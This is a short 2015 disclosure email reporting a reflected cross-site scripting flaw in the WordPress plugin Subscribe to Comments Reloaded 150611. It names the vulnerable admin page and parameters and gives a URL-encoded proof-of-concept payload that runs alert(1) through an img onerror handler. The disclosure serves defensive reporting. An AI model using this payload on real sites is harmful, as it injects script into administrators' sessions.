Subject: Cross-Site Scripting (XSS) in Subscribe to Comments Reloaded 150611

Date: Thu, 20 Aug 2015 16:00:44 +0200

Hello,

Plugin: Subscribe to Comments Reloaded 150611 https://wordpress.org/plugins/subscribe-to-comments-reloaded/

1. Reflected Cross-Site Scripting (XSS)

Authenticated administrators can inject html/js code (there is no CSRF protection).

Method: GET

Url: http://localhost/wp-admin/options-general.php?page=subscribe-to-comments-reloaded%2Foptions%2Findex.php&subscribepanel=1&sra=edit-subscription&srp=[xss]

Vulnerable parameters: srp, sre

Example PHP callstack:

/subscribe-to-comments-reloaded/options/panel1-edit-subscription.php:14

Verification:

http://localhost/wp-admin/options-general.php?page=subscribe-to-comments-reloaded%2Foptions%2Findex.php&subscribepanel=1&sra=edit-subscription&srp=%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E

--

Regards,
Marcin Probola,